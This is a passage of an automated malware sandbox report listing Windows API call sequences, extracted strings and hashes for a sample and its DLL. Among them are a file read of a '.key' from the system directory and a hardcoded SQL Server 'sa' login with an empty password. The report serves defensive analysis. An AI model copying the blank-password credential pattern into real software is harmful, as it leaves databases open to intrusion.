                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$GetUserObjectInformationA$SetThreadDesktop$kernel32.dll$user32.dll
                                • API String ID: 2238633743-588083535
                                • Opcode ID: ace536e1c349952b067a47b560408b7a2eb2072ed4bf8d4c000d9093c6c7e424
                                • Instruction ID: 9124bc14b98da240427bfac35c54383d2d1b03f3057c8906c8a047481d38408a
                                • Opcode Fuzzy Hash: ace536e1c349952b067a47b560408b7a2eb2072ed4bf8d4c000d9093c6c7e424
                                • Instruction Fuzzy Hash: 6E212C71D00218ABDB10DFA5DC84FEEBBB8FB48650F10421AF914A7240DB7999418B65
                                APIs
                                • Concurrency::details::UMSFreeVirtualProcessorRoot::InitialThreadParam::~InitialThreadParam.LIBCMTD ref: 0070E12F
                                • GlobalLock.KERNEL32(00000000), ref: 0070E13E
                                • CreateDialogIndirectParamA.USER32(00000000,00000000,?,0070D5F0,00000000), ref: 0070E18D
                                • GetLastError.KERNEL32 ref: 0070E196
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: InitialParamThread$Concurrency::details::CreateDialogErrorFreeGlobalIndirectLastLockParam::~ProcessorRoot::Virtual
                                • String ID: >>> AfxEnableControlContainer has not been called yet.$>>> If this dialog has OLE controls:$>>> You should call it in your app's InitInstance function.$Warning: Creating dialog from within a COleControlModule application is not a supported scenario.$Warning: Dialog creation failed! GetLastError returns 0x%8.8X$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcore.cpp
                                • API String ID: 2673599694-241984283
                                • Opcode ID: 48a0849d479d975317fc3d3e0c857806b383f2e164eaa737ef2b1ec1c4f0819f
                                • Instruction ID: 16b77bd32b80c87161687074172cf7fb65673c5a9d6a0cc6c896bdfae652b063
                                • Opcode Fuzzy Hash: 48a0849d479d975317fc3d3e0c857806b383f2e164eaa737ef2b1ec1c4f0819f
                                • Instruction Fuzzy Hash: 4BC14170E00208EFDB24EFA4C856BEEB7B5BF48304F108659E515A72D2DBB85945CFA1
                                APIs
                                • IsMenu.USER32(00000000), ref: 006EFDC7
                                • IsMenu.USER32(00000000), ref: 006EFDEF
                                • GetMenuItemCount.USER32(00000000), ref: 006EFE1F
                                • GetSubMenu.USER32(00000000,00000000), ref: 006EFE8A
                                • GetMenuState.USER32(00000000,00000000,00000400), ref: 006EFEA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Menu$CountItemState
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemisc.cpp
                                • API String ID: 4031802062-3062874304
                                • Opcode ID: 62038b0244a72cfba5c0a3ce131b59ef72eeccc1092c186cd751d71348e58389
                                • Instruction ID: 801124b01d1717ed147b93c47ed595884e2deb33b5252f5f2342e786d3dd18c7
                                • Opcode Fuzzy Hash: 62038b0244a72cfba5c0a3ce131b59ef72eeccc1092c186cd751d71348e58389
                                • Instruction Fuzzy Hash: 49B16CB1901209EBDB24CF98D994BEE77B6FF48304F108429FA15A7381DB34AA41CF65
                                APIs
                                • GlobalLock.KERNEL32(00000000), ref: 0072CB91
                                • GlobalUnlock.KERNEL32(00000000), ref: 0072CC0B
                                • UnpackDDElParam.USER32(000003E2,?,?,?), ref: 0072CC3A
                                • GlobalLock.KERNEL32(00000000), ref: 0072CCC1
                                • UnpackDDElParam.USER32(000003E8,?,?,00000000), ref: 0072CB2E
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • GlobalGetAtomNameA.KERNEL32(?,00000000,00000050), ref: 0072CD25
                                • GetClipboardFormatNameA.USER32(?,00000000,00000050), ref: 0072CD69
                                • GlobalUnlock.KERNEL32(00000000), ref: 0072CDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Global$LockMessageNameParamUnlockUnpack$AtomClipboardFormatPeekPostQuit
                                • String ID: %s: Advise item='%s', Format='%s', Ack=%d, Defer Update= %d$%s: Execute '%s'.$Warning: Unable to unpack WM_DDE_ADVISE lParam %08lX.$Warning: Unable to unpack WM_DDE_EXECUTE lParam %08lX.$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtrace.cpp
                                • API String ID: 3935610569-1487610237
                                • Opcode ID: 1f7964511019e7bf20b20d2f89de2ef99a574151eebd4ba53b2b2b780d0a6437
                                • Instruction ID: 3c43b7f7595c838e898938c774bd795f73fc5ff4a87a568a1e420df7468cdc3e
                                • Opcode Fuzzy Hash: 1f7964511019e7bf20b20d2f89de2ef99a574151eebd4ba53b2b2b780d0a6437
                                • Instruction Fuzzy Hash: 8881CB75A00219EFDB21EBA0DC46FBE7379EF64704F108159F509A71C1E7B89A80CB61
                                APIs
                                • CoInitialize.OLE32(00000000), ref: 006D22E0
                                • _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2322
                                  • Part of subcall function 0090DC10: @_RTC_CheckStackVars2@12.LIBCMTD ref: 0090DE06
                                • _com_issue_error.COMSUPPD ref: 006D233E
                                • _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2375
                                • _com_issue_error.COMSUPPD ref: 006D2392
                                • _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D23C8
                                • _com_issue_error.COMSUPPD ref: 006D23E5
                                • InterlockedIncrement.KERNEL32(00000008), ref: 006D23F6
                                • _com_issue_error.COMSUPPD ref: 006D240E
                                • InterlockedDecrement.KERNEL32(00000008), ref: 006D2420
                                • SysFreeString.OLEAUT32(00000000), ref: 006D2431
                                Strings
                                • Provider=SQLOLEDB; Server=localhost;Database=Hospital; uid=sa; pwd=;, xrefs: 006D2313
                                • ADODB.Connection, xrefs: 006D22EC
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: String_com_issue_error$Convert_com_util::$Interlocked$CheckDecrementFreeIncrementInitializeStackVars2@12
                                • String ID: ADODB.Connection$Provider=SQLOLEDB; Server=localhost;Database=Hospital; uid=sa; pwd=;
                                • API String ID: 4256052916-3185978970
                                • Opcode ID: b1c1389e57139e795ae946595024e7a9c2d5a0cdf1902d941e3d761e7f748d5c
                                • Instruction ID: 4bfdc5ad47a13ec4a0b6d68ef60821a7b41d3c56bbcbf4da9df4bc3408717579
                                • Opcode Fuzzy Hash: b1c1389e57139e795ae946595024e7a9c2d5a0cdf1902d941e3d761e7f748d5c
                                • Instruction Fuzzy Hash: B651F1B1C05256EFDB20EFA8C88179EFBF8AB58304F10456EE549B3341C2B55E40C7A6
                                APIs
                                • _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D3F1E
                                  • Part of subcall function 0090DC10: @_RTC_CheckStackVars2@12.LIBCMTD ref: 0090DE06
                                • _com_issue_error.COMSUPPD ref: 006D3F39
                                • _com_util::ConvertBSTRToString.COMSUPPD ref: 006D3F4B
                                • InterlockedDecrement.KERNEL32(00000008), ref: 006D3F6D
                                • SysFreeString.OLEAUT32(00000000), ref: 006D3F7A
                                • InterlockedIncrement.KERNEL32(?), ref: 006D3FAC
                                • InterlockedDecrement.KERNEL32(?), ref: 006D3FCE
                                • SysFreeString.OLEAUT32(00000000), ref: 006D3FDB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: String$Interlocked$ConvertDecrementFree_com_util::$CheckIncrementStackVars2@12_com_issue_error
                                • String ID: Insert Into BaseType(TypeId,TypeName) Values($__atl_condVal$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 2717914243-3416011081
                                • Opcode ID: 419f194001c1901845e25fb183f90e46918c224e458a6c2d4ea5308fad5e3e7c
                                • Instruction ID: 83f44bef454065f229e2c27080c03aca11177f994d8b06dab98fd617e7c0f906
                                • Opcode Fuzzy Hash: 419f194001c1901845e25fb183f90e46918c224e458a6c2d4ea5308fad5e3e7c
                                • Instruction Fuzzy Hash: C8D15972E407159FDB20DB68CC02BAEB3B5AF54714F14861EE519A73C2D774EA04CBA2
                                APIs
                                  • Part of subcall function 10008210: _malloc.LIBCMT ref: 1000822A
                                • _memset.LIBCMT ref: 10004F86
                                • _memset.LIBCMT ref: 10004FA0
                                • _memset.LIBCMT ref: 10004FBA
                                • FindWindowA.USER32(CTXOPConntion_Class,00000000), ref: 10004FC9
                                • _memset.LIBCMT ref: 10004FF5
                                • GetClassNameA.USER32(00000000,?,00000104), ref: 1000500A
                                • GetWindowTextA.USER32(00000000,?,00000104), ref: 1000505E
                                • lstrlenA.KERNEL32(00000000), ref: 100050AB
                                • GetWindow.USER32(00000000,00000002), ref: 100050FC
                                • lstrlenA.KERNEL32(00000000), ref: 1000510E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset$Window$lstrlen$ClassFindNameText_malloc
                                • String ID: CTXOPConntion_Class$_
                                • API String ID: 411318031-426622195
                                • Opcode ID: d75249ca1a48b1eb795abce09aef4370c0be62022b60cc201d166d34dfbe9423
                                • Instruction ID: 43fa3e18e072c6526fc845f9a4d1e46e41224d9bbfcc434be97b471cc13d1acf
                                • Opcode Fuzzy Hash: d75249ca1a48b1eb795abce09aef4370c0be62022b60cc201d166d34dfbe9423
                                • Instruction Fuzzy Hash: 8F415B3150424A9FF701CB248CD9BEB77E9EF557C5F1440A4EA849B185EBB3AA888790
                                APIs
                                • _memset.LIBCMT ref: 1000246A
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000247E
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10002510
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 10002527
                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10002543
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 10002562
                                • _memmove.LIBCMT ref: 10002573
                                • LocalFree.KERNEL32(00000000,00000000,?), ref: 1000258B
                                • CloseHandle.KERNEL32(?), ref: 1000259E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateDirectoryFreeHandleReadSizeSystem_memmove_memset
                                • String ID: .key$Default
                                • API String ID: 2309055067-1583214558
                                • Opcode ID: f61336947d43f9f9d12ba5c19e4f948eab2fd486e21b0c9db99e5f4ea27e702e
                                • Instruction ID: 9a1af1fba01435b1a18f7c2fdfabd992c8a340263b1b97c122494dd5a995472a
                                • Opcode Fuzzy Hash: f61336947d43f9f9d12ba5c19e4f948eab2fd486e21b0c9db99e5f4ea27e702e
                                • Instruction Fuzzy Hash: E2414570A00229ABE701CB648C95BEFB7E8EF49345F044194FA49DB241E6319E04C7A0
                                APIs
                                • IsMenu.USER32(00000000), ref: 006F0142
                                • IsMenu.USER32(00000000), ref: 006F016A
                                • IsMenu.USER32(00000000), ref: 006F0192
                                • GetMenuItemCount.USER32(00000000), ref: 006F01B4
                                • GetMenuItemCount.USER32(00000000), ref: 006F01C1
                                • GetSubMenu.USER32(00000000,00000000), ref: 006F01F0
                                • GetMenuItemCount.USER32(00000000), ref: 006F020D
                                • GetSubMenu.USER32(00000000,00000000), ref: 006F0238
                                • RemoveMenu.USER32(00000000,00000000,00000400), ref: 006F0250
                                • GetSubMenu.USER32(00000000,00000000), ref: 006F0285
                                • RemoveMenu.USER32(00000000,00000000,00000400), ref: 006F029D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Menu$CountItem$Remove
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemisc.cpp
                                • API String ID: 3494307843-3062874304
                                • Opcode ID: 7d3a962b4cf6158317d4c5035bf92622d14ffd57cf4f4854b7931d392cfe6316
                                • Instruction ID: ecf364ecfe94ad3b9b352a29ad78eeb24be966a7ca2c811551597127a8e99f5c
                                • Opcode Fuzzy Hash: 7d3a962b4cf6158317d4c5035bf92622d14ffd57cf4f4854b7931d392cfe6316
                                • Instruction Fuzzy Hash: 65414971A0420DEBEB24DFE4DC4CBBE77BAFF44304F208409EA15A6285C7749A42DB65
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$PeekPostQuit
                                • String ID: ?$?$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemisc.cpp
                                • API String ID: 1744142723-3175008031
                                • Opcode ID: 509496bc1fd9cd935d61bc971c741b46f39b0ba207e0476709567ce914e27a8a
                                • Instruction ID: 47e17f59ff8da4109e6ab9ce847c78b73a8ed370bddc32b06ef85ca2c6c3d31c
                                • Opcode Fuzzy Hash: 509496bc1fd9cd935d61bc971c741b46f39b0ba207e0476709567ce914e27a8a
                                • Instruction Fuzzy Hash: E5121674600209EFEB14CF54C995BAAB7B6BF88300F24C558EA19AB392D771ED41CF90
                                APIs
                                • _memset.LIBCMT ref: 006F34DB
                                • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 006F3527
                                • _memset.LIBCMT ref: 006F359B
                                • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 006F35FA
                                • collate.LIBCPMTD ref: 006F365F
                                • collate.LIBCPMTD ref: 006F341B
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • _memset.LIBCMT ref: 006F37AD
                                • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 006F3807
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Iterator_baseIterator_base::__memsetstd::_$Messagecollate$PeekPostQuit
                                • String ID: 40o$40o$f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtempl.h
                                • API String ID: 573268896-890115525
                                • Opcode ID: 29193a99e70cc1a4e9c4ec6125289e37d1091b2111fcee9068b2f1b74c5e2cf0
                                • Instruction ID: a87e237a627095c7085a219e5d8587966bc416b8eb95f9fd62d2cbe07458c964
                                • Opcode Fuzzy Hash: 29193a99e70cc1a4e9c4ec6125289e37d1091b2111fcee9068b2f1b74c5e2cf0
                                • Instruction Fuzzy Hash: E702E4B4A00258DFCB08DF94C595AADBBB2FF84314F248119E919AF385D735EA85CF84
                                APIs
                                • CopyImage.USER32(00000000,00000000,00000000,00000000,00002000), ref: 007E8355
                                • GetObjectA.GDI32(00000000,00000018,?), ref: 007E838E
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • DeleteObject.GDI32(00000000), ref: 007E8448
                                • GetObjectA.GDI32(00000000,00000018,?), ref: 007E8498
                                • GetObjectA.GDI32(00000000,00000018,?), ref: 007E850B
                                  • Part of subcall function 00718560: SelectObject.GDI32(?,00000000), ref: 0071859E
                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 007E85DD
                                  • Part of subcall function 0071B200: DeleteDC.GDI32(00000000), ref: 0071B24A
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarimages.cpp, xrefs: 007E8318
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Object$DeleteMessage$BitmapCompatibleCopyCreateImagePeekPostQuitSelect
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarimages.cpp
                                • API String ID: 4273962740-2040512386
                                • Opcode ID: 5a3a59f28a0de00da62d7e04613695e665545645c4d3654ec7d957de7f9d140e
                                • Instruction ID: 9cffa972c0dc49aafda9af534a818d273d32d1f62fdd701c9f033c4fcadfb43a
                                • Opcode Fuzzy Hash: 5a3a59f28a0de00da62d7e04613695e665545645c4d3654ec7d957de7f9d140e
                                • Instruction Fuzzy Hash: 44F10770901218DFDB64DFA8C898BEEB775BF48710F208298E5196B2D1DB346E86CF51
                                APIs
                                • GetProcAddress.KERNEL32(00000000,GetGestureInfo), ref: 006F9030
                                • GetProcAddress.KERNEL32(00000000,CloseGestureInfoHandle), ref: 006F905F
                                  • Part of subcall function 00702350: ActivateActCtx.KERNEL32(?,00000000,ED5B0DC1), ref: 00702399
                                • _memset.LIBCMT ref: 006F90BD
                                • _memset.LIBCMT ref: 006F9104
                                • std::_Fac_node::_Fac_node.LIBCPMTD ref: 006F9132
                                  • Part of subcall function 00705EC0: IsWindow.USER32(?), ref: 00705ED0
                                  • Part of subcall function 00705EC0: ScreenToClient.USER32(?,?), ref: 00705EF6
                                • std::_Fac_node::_Fac_node.LIBCPMTD ref: 006F91AB
                                • _memset.LIBCMT ref: 006F91DA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset$AddressFac_nodeFac_node::_Procstd::_$ActivateClientScreenWindow
                                • String ID: CloseGestureInfoHandle$GetGestureInfo$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp$user32.dll
                                • API String ID: 4081668882-2113730790
                                • Opcode ID: f0e92fb3354bd83ba260a49448ba795eb3cfeb9844a849193cac1de21f998ac4
                                • Instruction ID: e76e4beccb3824757aa8e90354348c44c03f0f4902f28d8de96568caf4f7c72c
                                • Opcode Fuzzy Hash: f0e92fb3354bd83ba260a49448ba795eb3cfeb9844a849193cac1de21f998ac4
                                • Instruction Fuzzy Hash: FBE10B75E14109DFCB08DFA8D895EAEB7F2FB88304F108259EA15AB391D771A845CF50
                                APIs
                                • lstrlenA.KERNEL32(00000000,006D1875,0090AE67,006EFBC0,006D1875), ref: 006EFA9F
                                • lstrlenA.KERNEL32(006D1875,006D1875,006D1875,006D1875,006D1875,0090AE67,006EFBC0,006D1875), ref: 006EFB36
                                • lstrlenA.KERNEL32(?), ref: 006EFB42
                                • _swprintf_s.LIBCMTD ref: 006EFAC6
                                  • Part of subcall function 008E27C0: __vsprintf_s_l.LIBCMTD ref: 008E27DE
                                • lstrlenA.KERNEL32(00000000,006D1875,006D1875,0090AE67,006EFBC0,006D1875), ref: 006EFAE9
                                • _swprintf_s.LIBCMTD ref: 006EFB10
                                • _swprintf_s.LIBCMTD ref: 006EFB6E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$_swprintf_s$__vsprintf_s_l
                                • String ID: %s ($%08lX)$<scode string too long>$range: %s ($%08lX)$severity: %s, facility: %s ($%08lX)
                                • API String ID: 4071572865-537258730
